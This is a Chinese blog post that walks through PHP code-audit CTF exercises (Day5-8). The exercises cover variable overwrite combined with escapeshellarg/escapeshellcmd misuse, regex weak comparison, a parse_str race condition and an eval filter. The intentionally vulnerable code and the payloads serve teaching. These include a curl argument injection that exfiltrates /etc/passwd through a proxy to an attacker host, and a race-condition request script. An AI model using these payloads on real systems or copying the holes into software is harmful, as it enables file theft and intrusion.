2. 程式人生 > >PHP程式碼審計Day5-8練習題

PHP程式碼審計Day5-8練習題

阿新 發佈:2018-11-29

文章目錄

前言

改自先知社群-紅日安全-

Day5 – escapeshellarg與escapeshellcmd使用不當

<?php
highlight_file('5.php');
function waf($a){
    foreach($a as $key => $value){
        if(preg_match('/flag/i',$key)){
            exit('are you a hacker');
        }
    }
}
foreach(array('_POST', '_GET', '_COOKIE'
 
) as $__R) {
    if($$__R) { 
        foreach($$__R as $__k => $__v) { 
            if(isset($$__k) && $$__k == $__v) unset($$__k); 
        }
    }

}
if($_POST) { waf($_POST);}
if($_GET) { waf($_GET); }
if($_COOKIE) { waf($_COOKIE);}

if($_POST) extract($_POST, EXTR_SKIP);
if($_GET) extract
 
($_GET, EXTR_SKIP);
var_dump($_GET);
echo '<br></br>';
if(isset($_GET['flag'])){
    if($_GET['flag'] === $_GET['hongri']){
        exit('error');
    }
    if(md5($_GET['flag'] ) == md5($_GET['hongri'])){
        $url = $_GET['url'];
        $urlInfo = parse_url($url);
	var_dump($urlInfo);
	echo '<br></br>';
        if(!("http" === strtolower($urlInfo["scheme"]) || "https"===strtolower($urlInfo["scheme"]))){
            die( "scheme error!");
        }
        $url = escapeshellarg($url);
        $url = escapeshellcmd($url);
	    echo $url;
        system("curl ".$url);
    }
}
?>

解題

第一部分

10行-13行的一串程式碼

foreach(array('_POST', '_GET', '_COOKIE') as $__R) {
    if($$__R) { 
        foreach($$__R as $__k => $__v) { 
            if(isset($$__k) && $$__k == $__v) unset($$__k); 
        }
    }

}

分析下邏輯:

  • 首先第1行迴圈GET,POST,_COOKIE字串,依次的的賦予到$__R第2行再判斷$$__R是否存在(eg:_ G E T , GET),如果存在則將超全域性數組裡的鍵賦予給` k,比較鍵名名字的變數的值是否與陣列鍵對應的值相等,若相等則unset`(摧毀變數)

利用:

  • 通過GET請求提交flag=test,再POST請求提交_GET[flag]=test.這個時候GET陣列中就已經存在GET[flag]=test.當第1行迴圈到POST時,我們傳入的_GET[flag]$$__k中是就為$_GET[flag],而這個的值也是test則就會刪除這個變數.就沒有經過waf判斷
  • 22-23行這個變數又會被建立
if($_POST) extract($_POST, EXTR_SKIP);
if($_GET) extract($_GET, EXTR_SKIP);

這樣我們提交的_GET[flag]=test,就被提取成了$_GET[flag]=test.
加了點程式碼演示一下:

還有一個MD5的判斷,意思就是變數值不一樣,但MD5加密後要相等,利用科學計數法繞過,0e開頭的科學計數的值是相等的,所以找MD5加密後開頭為0e的

payload:

第二部分

  • 考察利用curl讀取檔案,主要就是利用escapeshellargescapeshellcmd.
  • curl中存在 -F 提交表單的方法,也可以提交檔案。 -F <key=value> 向伺服器POST表單,例如: curl -F "[email protected];type=text/html" url.com 。提交檔案之後,利用代理的方式進行監聽,這樣就可以截獲到檔案了,同時還不受最後的的影響。
    示範
http://baidu.com/' -F [email protected]/etc/passwd -x  vps:9999

payload

Day6 - 正則使用不當導致的路徑穿越問題

<?php
include 'flag.php';
if  ("POST" == $_SERVER['REQUEST_METHOD'])
{
    $password = $_POST['password'];
    if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password))
    {
        echo 'Wrong Format';
        exit;
    }
    while (TRUE)
    {
        $reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
        if (6 > preg_match_all($reg, $password, $arr))
            break;
        $c = 0;
        $ps = array('punct', 'digit', 'upper', 'lower');
        foreach ($ps as $pt)
        {
            if (preg_match("/[[:$pt:]]+/", $password))
            $c += 1;
        }
        if ($c < 3) break;
        if ("42" == $password) echo $flag;
        else echo 'Wrong password';
        exit;
    }
}
highlight_file(__FILE__);
?>

PHP對字元類的定義,具體點這裡

[:alnum:] 字母和數字
[:alpha:] 代表任何英文大小寫字元,亦即 A-Z, a-z
[:lower:] 小寫字母
[:upper:] 大寫字母
[:blank:] 水平空白字元(空格和製表符)
[:space:] 所有水平和垂直的空白字元(比[:blank:]包含的範圍廣)
[:cntrl:] 不可列印的控制字元(退格、刪除、警鈴...)
[:digit:] 十進位制數字
[:graph:] 可列印的非空白字元
[:print:] 可列印字元
[:punct:] 標點符號
[:xdigit:] 十六進位制數字

解題

主要考察了PHP正則表示式的字元類的熟練。

  • 第6行,正則表示式
  if (0 >= preg_match('/^[[:graph:]]{12,}/', password))

匹配可列印字元12個及以上,就是password的長度至少為12

  • 第13-15行,正則表示式
$reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
if (6 > preg_match_all($reg, $password, $arr))
    break;

連續的符號、數字、大寫、小寫,作為一段,至有六段。比如TEst+-TEst01,分為TE,st,+-,TE,st,01這六段

  • 第17-23行,表示為輸入的字串至少含有符號、數字、大寫、小寫中的三種類型
$ps = array('punct', 'digit', 'upper', 'lower');
foreach ($ps as $pt)
{
    if (preg_match("/[[:$pt:]]+/", $password))
    $c += 1;
}
if ($c < 3) break;
  • 24行進行了弱比較,利用科學計數法使一長串字元的結果為42

payload

password=42.0e+000000

password=420.00000e-1

Day7 - parse_str函式缺陷

<?php
$a = “hongri”;
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    echo '<a href="uploadsomething.php">flag is here</a>';
}
?>

//uploadsomething.php
<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
    $savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
    if (!is_dir($savepath)) {
        $oldmask = umask(0);
        mkdir($savepath, 0777);
        umask($oldmask);
    }
    if ((@$_GET['filename']) && (@$_GET['content'])) {
        //$fp = fopen("$savepath".$_GET['filename'], 'w');
        $content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
        file_put_contents("$savepath" . $_GET['filename'], $content);
        $msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
        usleep(100000);
        $content = "Too slow!";
        file_put_contents("$savepath" . $_GET['filename'], $content);
    }
   print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
    echo 'you can not see this page';
}
?>

解題

環境搭建沒成功,原文複製

  • 在 index.php 第4行存在 @parse_str($id); 這個函式不會檢查變數 $id 是否存在,如果通過其他方式傳入資料給變數 $id ,且當前 $id 中資料存在,它將會直接覆蓋掉。而在第6行有一段這樣程式碼。
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO'))

PHP Hash比較存在缺陷 ,它把每一個以”0E”開頭的雜湊值都解釋為0,所以如果兩個不同的密碼經過雜湊以後,其雜湊值都是以”0E”開頭的,那麼PHP將會認為他們相同,都是0。而這裡的 md5(‘QNKCDZO’) 的結果是 0e830400451993494058024219903391 。所以payload為?id=a[0]=s878926199a。這樣就可以在頁面上回顯。

echo '<a href="uploadsomething.php">flag is here</a>';
  • 而這題真正的考察點在這裡。在 uploadsomething.php 的第3行和第4行有這樣兩句程式碼如下:
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false)

這裡有個refer判斷,判斷 refer 是否存在,如果有展現上傳頁面,如果沒有,就返回 you can not see this page 。

據我們所知,通過a標籤點選的連結,會自己自動攜帶上refer欄位。然後 攜帶refer 和 不攜帶refer ,返回的結果不一樣。

攜帶refer 的情況:

不攜帶refer 的情況:

  • 然後在 uploadsomething.php 的第13行第18行有這樣程式碼如下:
$content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
file_put_contents("$savepath" . $_GET['filename'], $content);
$msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
usleep(100000);
$content = "Too slow!";
file_put_contents("$savepath" . $_GET['filename'], $content);

這裡有一句關鍵就是 usleep(100000); 這題需要在寫入 too slow 之前,訪問之前寫入的檔案,即可獲得flag,這裡就存在時間競爭問題。但是我們看到其實這裡的資料夾路徑是固定寫死的。

直接訪問會返回 too slow

因此這裡的解法是,開Burp的200執行緒,一個不斷髮包

http://127.0.0.1/parse_str/uploadsomething.php?filename=flag&content=111

或指令碼

import requests as r
r1=r.Session()
while (1):
    r2=r1.get("http://127.0.0.1/parse_str/uploads/4b84b15bff6ee5796152495a230e45e3d7e947d9/flag")
    print r2.text
    pass

Day8 - preg_replace函式之命令執行

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if(strlen($code)>40){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){
        die("NO.");
    }
    @eval($code);
}
else{
    highlight_file(__FILE__);
}
highlight_file(__FILE);
// $hint = "php function getFlag() to get flag";

?>

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if(strlen($code)>50){
        die("Too Long.");
    }
    if(preg_match("/[A-Za-z0-9_]+/",$code)){
        die("Not Allowed.");
    }
    @eval($code);
}
else{
    highlight_file(__FILE__);
}
highlight_file(__FILE);
// $hint = "php function getFlag() to get flag";
?>

\\flag.php
function getFlag()
{
echo "HRCTF{f1lt3r_var_1s_s0_c00l}";
}
?>

解題

移步PHP不包括字母,數字和下劃線的webshell

相關推薦

PHP程式碼審計Day5-8練習題

文章目錄 前言 Day5 – escapeshellarg與escapeshellcmd使用不當 解題 第一部分 payload: 第二部分 payload

PHP程式碼審計Day1-4練習題

文章目錄 Day1 in_array函式缺陷 解題 payload Day2 - filter_var函式缺陷 解題 payload Day3 例項化

PHP程式碼審計Day學習筆記5-8

文章目錄 Day5 - escapeshellarg與escapeshellcmd使用不當 前言 mail() FILTER_VALIDATE_EMAIL escapeshellcmd() escapes

PHP程式碼審計入門

部落格轉載 --程式碼審計入門   程式碼審計--準備 1,先放一張大圖,php程式碼審計的幾個方向,也是容易出問題的地方,沒事的時候可以多看看。   2,程式碼審計也就是拿到某網站的原始碼,進行審計,從而發現漏洞,但是我們審計的時候並不一定要一行一行的去看吧,這樣未免也太浪費時

php程式碼審計命令執行漏洞

命令執行漏洞,使用者通過瀏覽器在遠端伺服器上執行任意系統命令,嚴格意義上,與程式碼執行漏洞還是有一定的區別。  常用命令執行函式 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引

PHP程式碼審計-SQL注入漏洞挖掘

SQL注入經常出現在登入頁面,HTTP頭(user-agent/client-ip/cookies等),訂單處理等地方,在發生多個互動的地方經常會發生二次注入。 普通注入 $uid = $_GET[‘id’]; $sql = “select * from user where id=$

PHP程式碼審計Day學習筆記

Day1 in_array函式缺陷 定義 in_array函式 bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) 引數 描述 needle

PHP程式碼審計學習

原文:http://paper.tuisec.win/detail/1fa2683bd1ca79c 作者:June 這是一次分享準備。自己還沒有總結這個的能力,這次就當個搬運工好了~~ 0x01 工具準備 PHPSTORM,不只是程式設計。 個人覺得只要能夠提供全域性搜尋、單

PHP程式碼審計

目錄 概述 輸入驗證和輸出顯示 3 2.1 命令注入 4 2.2 跨站指令碼 4 2.3 檔案包含 5 2.4 程式碼注入 5 2.5 SQL注入 6 2.6 XPath注入 6 2.7 HTTP響應拆分 6 2.8 檔案管理 6 2.9 檔案上傳 7

PHP程式碼審計實戰之XDcms

這裡主要講v2.0.8版本的XDcms中的一個基於錯誤的SQL注入漏洞,較v2.0.7版本而言修復了很多注入漏洞,使得注入漏洞大為減少。 至於CMS的下載配置等就不說了,直接審計吧~ 先整體看,點選index.php,先判斷是否存在檔案config.inc.php,若不存在

PHP程式碼審計片段講解(入門程式碼審計、CTF必備)

關於本專案 程式碼審計對於很多安全圈的新人來說,一直是一件頭疼的事情,也想跟著大牛們直接操刀審計CMS?卻處處碰壁: 函式看不懂! 漏洞原理不知道! PHP特性更不知! 那還怎麼愉快審計? 不如化繁為簡,跟著本專案先搞懂PHP中大多敏感函式與各類特性,再逐漸增加難度

PHP程式碼審計之命令執行

成功執行. 在具體分析細節之前,先說一下create_function()。 create_function返回一個字串的函式名, 這個函式名的格式是: "\000_lambda_" . count(anonymous_functions)++    我們來看看create_function的實現步驟:

PHP程式碼審計之路——5.程式碼執行及一句話木馬總結

mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行 bool assert ( mixed $assertion [, string $description ] ) PHP 5bool assert ( mixed $asse

PHP程式碼審計————1、PHP程式碼審計之環境搭建

前言本系列部落格,主要講解PHP程式碼審計。從環境搭建到具體的實戰分析將會一步一步深入學習,希望可以對大家有所幫助。審計環境搭建作業系統:Window 7軟      件:phpstudy、VMware workstations14、seay 程式碼審計軟體、notepad+

PHP程式碼審計-常見危險函式

PHP程式碼執行函式 eval & assert & preg_replace eval 函式 說明: mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行。 注意: 函式

CTF-PHP程式碼審計,正則表示式記錄

一、PHP自動化的全域性變數:$GLOBALS — 引用全域性作用域中可用的全部變數,一個包含了全部變數的全域性組合陣列。變數的名字就是陣列的鍵。flag In the variable ! <?

PHP程式碼審計練習一

定個小目標,每天審計一套原始碼。大的站點搞不定就找些小的來練習。這次練習的是一個留言版本的小功能。1.驗證碼可以從cookie中獲取。程式碼中留言板提交的驗證碼直接跟cookie中的regimcode中進行比較。那麼我們直接提交的時候抓包所以直接可以從cookie中獲取驗證碼

PHP程式碼審計 16 漏洞挖掘的思路

本文記錄 PHP 程式碼審計的學習過程,教程為暗月 2015 版的 PHP 程式碼審計課程 1. 簡介 漏洞形成的條件 可以控制的變數(一切輸入都是有害的) 變數到達有利

PHP程式碼審計實戰之MetInfo CMS

這次主要白盒審計MetInfo CMS的一個變數覆蓋漏洞。 先檢視\include\common.inc.php檔案,因為其中是通過$_request來獲取使用者請求的資訊: 這裡是遍歷初始化變數,很可能會出現變數覆蓋,判斷了key的第一個字元是不是“_”來避免覆蓋系統全

PHP程式碼審計01之in_array()函式缺陷

#前言 從今天起,結合紅日安全寫的文章,開始學習程式碼審計,題目均來自**PHP SECURITY CALENDAR 2017**,講完這個題目,會再用一道有相同問題的CTF題來進行鞏固。下面開始分析。 #漏洞分析 下面我們看第一題,程式碼如下: ``` ``` 這一關考察的是任意檔案上傳漏洞,導致這個漏洞